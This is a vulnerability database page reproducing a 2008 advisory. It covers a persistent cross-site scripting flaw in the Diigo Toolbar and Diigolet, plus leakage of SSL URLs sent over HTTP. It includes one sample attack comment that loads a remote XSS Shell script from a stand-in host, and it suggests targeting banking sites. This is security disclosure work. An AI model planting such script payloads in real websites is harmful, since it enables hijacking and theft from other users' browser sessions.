Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

diigo-xss.txt

🗓️ 20 Jun 2008 00:00:00Reported by Ferruh MavitunaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Diigo Toolbar had a global XSS vulnerability affecting all users, allowing attackers to inject malicious code into websites and execute it on other users' browsers. It also had an information leakage issue with SSL URLs sending sensitive data over HTTP.

Code
`Diigo Toolbar - Global XSS and Information Leakage in SSL URLs  
  
== Global XSS ==  
Diigo is (http://www.diigo.com/) a social bookmarking and sharing  
application which allows users to see other users comments and notes  
for every website. For this feature users should use Diigolet  
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are  
almost mandatory to use Diigo and almost all Diigo members have them  
installed.  
  
An attacker can do Cross-site Scripting in these public comments and  
that comment will affect any other user of Diigo Toolbar and Diigolet  
who visits the website. This means a Diigo user can backdoor any  
website in the internet easily with a permanent XSS and any other  
Diigo user who visits this website will be affected. Vulnerability  
exists in:  
* Diigo Toolbar for IE,  
* Diigo Toolbar for FF,  
* Diigolet for IE and FF,  
  
These comments will be injected into the current domain context, thus  
an attacker can execute a Javascript code in the target domain,  
Target URL can be over SSL as well. All Diigo tools users are affected  
from this vulnerability.  
  
For an attacker this is a perfect opportunity to use some XSS bot  
manager application such as XSS Shell, Also an attacker can attack  
high profile websites such as online banking applications. Considering  
you can search in shared bookmarks so you can actually people who uses  
a certain online banking application.  
  
Sample attack comment can be:  
<script src="http://example.com/xssshell/"></script>  
  
  
== Fix ==  
Download latest version of Diigo Toolbar  
  
== Disclosure Timeline ==  
* 12 May 2008 - Vendor Informed  
* 2 June 2008 - Another e-mail to vendor to check if they've fixed  
* 3 June 2008 - Vendor informed me that it's fixed  
* 20 June 2008 - Public Release  
  
  
== Information Leakage in SSL URLs ==  
Diigo toolbar is sending all SSL URLs to their servers over HTTP for  
shared comment feature, which might cause to leak session_ids over URL  
or any other sensitive information transferred over URL.  
  
  
== Fix ==  
User can not opt-out from this feature. There is no known fix, this  
looks like considered as a feature not a bug.  
  
== Disclosure Timeline ==  
* 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried  
to explain why this is bad, it didn't work.  
* 12 May 2008 - Ask for an update, No response.  
* 20 June 2008 - Public Release  
  
  
--  
Ferruh Mavituna  
http://ferruh.mavituna.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4
diigo toolbarxssglobalvulnerabilityinjectionmalicious codebrowsersinformation leakagesslurlssensitive data
22